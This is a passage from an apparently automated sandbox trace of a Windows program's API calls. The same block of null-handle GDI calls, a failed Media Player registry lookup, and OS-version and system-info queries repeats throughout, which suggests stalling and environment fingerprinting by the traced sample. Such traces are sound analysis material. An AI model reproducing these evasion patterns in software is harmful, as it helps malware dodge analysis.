h=0x0) returned 0x0 [0092.466] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.466] BeginPath (hdc=0x0) returned 0 [0092.466] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.466] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.466] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.466] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.466] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.466] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.466] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf90401dc [0092.466] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb0401d9 [0092.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478d7 [0092.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478d8 [0092.466] CombineRgn (hrgnDst=0x10478d7, hrgnSrc1=0xf90401dc, hrgnSrc2=0xfb0401d9, iMode=1) returned 1 [0092.466] CombineRgn (hrgnDst=0x10478d8, hrgnSrc1=0xf90401dc, hrgnSrc2=0xfb0401d9, iMode=4) returned 2 [0092.466] CreateSolidBrush (color=0xff) returned 0x21078d6 [0092.466] CreateSolidBrush (color=0xff0000) returned 0x11078d9 [0092.466] DeleteObject (ho=0x11078d9) returned 1 [0092.466] DeleteObject (ho=0xfb0401d9) returned 1 [0092.467] DeleteObject (ho=0xf90401dc) returned 1 [0092.467] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.467] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.467] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.467] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.467] BeginPath (hdc=0x0) returned 0 [0092.467] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.467] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.467] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.467] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.467] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc0401d9 [0092.467] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa0401dc [0092.467] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478da [0092.467] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478db [0092.467] CombineRgn (hrgnDst=0x10478da, hrgnSrc1=0xfc0401d9, hrgnSrc2=0xfa0401dc, iMode=1) returned 1 [0092.467] CombineRgn (hrgnDst=0x10478db, hrgnSrc1=0xfc0401d9, hrgnSrc2=0xfa0401dc, iMode=4) returned 2 [0092.467] CreateSolidBrush (color=0xff) returned 0x21078d9 [0092.467] CreateSolidBrush (color=0xff0000) returned 0x11078dc [0092.467] DeleteObject (ho=0x11078dc) returned 1 [0092.467] DeleteObject (ho=0xfa0401dc) returned 1 [0092.468] DeleteObject (ho=0xfc0401d9) returned 1 [0092.468] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.468] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.468] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.468] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.468] BeginPath (hdc=0x0) returned 0 [0092.468] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.468] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.468] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.468] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.468] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb0401dc [0092.468] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd0401d9 [0092.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478dd [0092.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478de [0092.468] CombineRgn (hrgnDst=0x10478dd, hrgnSrc1=0xfb0401dc, hrgnSrc2=0xfd0401d9, iMode=1) returned 1 [0092.468] CombineRgn (hrgnDst=0x10478de, hrgnSrc1=0xfb0401dc, hrgnSrc2=0xfd0401d9, iMode=4) returned 2 [0092.468] CreateSolidBrush (color=0xff) returned 0x21078dc [0092.468] CreateSolidBrush (color=0xff0000) returned 0x11078df [0092.468] DeleteObject (ho=0x11078df) returned 1 [0092.468] DeleteObject (ho=0xfd0401d9) returned 1 [0092.468] DeleteObject (ho=0xfb0401dc) returned 1 [0092.469] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.469] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.469] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.469] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.469] BeginPath (hdc=0x0) returned 0 [0092.469] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.469] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.469] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.469] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.469] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe0401d9 [0092.469] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc0401dc [0092.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e0 [0092.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e1 [0092.469] CombineRgn (hrgnDst=0x10478e0, hrgnSrc1=0xfe0401d9, hrgnSrc2=0xfc0401dc, iMode=1) returned 1 [0092.469] CombineRgn (hrgnDst=0x10478e1, hrgnSrc1=0xfe0401d9, hrgnSrc2=0xfc0401dc, iMode=4) returned 2 [0092.469] CreateSolidBrush (color=0xff) returned 0x21078df [0092.469] CreateSolidBrush (color=0xff0000) returned 0x11078e2 [0092.469] DeleteObject (ho=0x11078e2) returned 1 [0092.469] DeleteObject (ho=0xfc0401dc) returned 1 [0092.469] DeleteObject (ho=0xfe0401d9) returned 1 [0092.469] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.469] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.470] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.470] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.470] BeginPath (hdc=0x0) returned 0 [0092.470] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.470] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.470] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.470] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.470] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd0401dc [0092.470] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff0401d9 [0092.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e3 [0092.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e4 [0092.470] CombineRgn (hrgnDst=0x10478e3, hrgnSrc1=0xfd0401dc, hrgnSrc2=0xff0401d9, iMode=1) returned 1 [0092.470] CombineRgn (hrgnDst=0x10478e4, hrgnSrc1=0xfd0401dc, hrgnSrc2=0xff0401d9, iMode=4) returned 2 [0092.470] CreateSolidBrush (color=0xff) returned 0x21078e2 [0092.470] CreateSolidBrush (color=0xff0000) returned 0x11078e5 [0092.470] DeleteObject (ho=0x11078e5) returned 1 [0092.470] DeleteObject (ho=0xff0401d9) returned 1 [0092.470] DeleteObject (ho=0xfd0401dc) returned 1 [0092.470] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.470] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.471] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.471] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.471] BeginPath (hdc=0x0) returned 0 [0092.471] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.471] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.471] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.471] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.471] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x401d9 [0092.471] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe0401dc [0092.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e6 [0092.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e7 [0092.471] CombineRgn (hrgnDst=0x10478e6, hrgnSrc1=0x401d9, hrgnSrc2=0xfe0401dc, iMode=1) returned 1 [0092.471] CombineRgn (hrgnDst=0x10478e7, hrgnSrc1=0x401d9, hrgnSrc2=0xfe0401dc, iMode=4) returned 2 [0092.471] CreateSolidBrush (color=0xff) returned 0x21078e5 [0092.471] CreateSolidBrush (color=0xff0000) returned 0x11078e8 [0092.471] DeleteObject (ho=0x11078e8) returned 1 [0092.472] DeleteObject (ho=0xfe0401dc) returned 1 [0092.472] DeleteObject (ho=0x401d9) returned 1 [0092.472] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.472] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.472] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.472] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.472] BeginPath (hdc=0x0) returned 0 [0092.472] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.472] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.472] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.472] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.472] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff0401dc [0092.473] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x10401d9 [0092.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478e9 [0092.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ea [0092.473] CombineRgn (hrgnDst=0x10478e9, hrgnSrc1=0xff0401dc, hrgnSrc2=0x10401d9, iMode=1) returned 1 [0092.473] CombineRgn (hrgnDst=0x10478ea, hrgnSrc1=0xff0401dc, hrgnSrc2=0x10401d9, iMode=4) returned 2 [0092.473] CreateSolidBrush (color=0xff) returned 0x21078e8 [0092.473] CreateSolidBrush (color=0xff0000) returned 0x11078eb [0092.473] DeleteObject (ho=0x11078eb) returned 1 [0092.473] DeleteObject (ho=0x10401d9) returned 1 [0092.473] DeleteObject (ho=0xff0401dc) returned 1 [0092.473] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.473] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.473] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.473] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.473] BeginPath (hdc=0x0) returned 0 [0092.473] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.473] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.473] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.474] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20401d9 [0092.474] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x401dc [0092.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ec [0092.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ed [0092.474] CombineRgn (hrgnDst=0x10478ec, hrgnSrc1=0x20401d9, hrgnSrc2=0x401dc, iMode=1) returned 1 [0092.474] CombineRgn (hrgnDst=0x10478ed, hrgnSrc1=0x20401d9, hrgnSrc2=0x401dc, iMode=4) returned 2 [0092.474] CreateSolidBrush (color=0xff) returned 0x21078eb [0092.474] CreateSolidBrush (color=0xff0000) returned 0x11078ee [0092.474] DeleteObject (ho=0x11078ee) returned 1 [0092.474] DeleteObject (ho=0x401dc) returned 1 [0092.474] DeleteObject (ho=0x20401d9) returned 1 [0092.474] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.474] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.474] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.474] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.474] BeginPath (hdc=0x0) returned 0 [0092.474] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.474] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.474] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.474] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.475] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10401dc [0092.475] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x30401d9 [0092.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ef [0092.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f0 [0092.475] CombineRgn (hrgnDst=0x10478ef, hrgnSrc1=0x10401dc, hrgnSrc2=0x30401d9, iMode=1) returned 1 [0092.475] CombineRgn (hrgnDst=0x10478f0, hrgnSrc1=0x10401dc, hrgnSrc2=0x30401d9, iMode=4) returned 2 [0092.475] CreateSolidBrush (color=0xff) returned 0x21078ee [0092.475] CreateSolidBrush (color=0xff0000) returned 0x11078f1 [0092.475] DeleteObject (ho=0x11078f1) returned 1 [0092.475] DeleteObject (ho=0x30401d9) returned 1 [0092.475] DeleteObject (ho=0x10401dc) returned 1 [0092.475] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.475] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.475] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.475] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.475] BeginPath (hdc=0x0) returned 0 [0092.475] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.475] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.475] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.475] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: 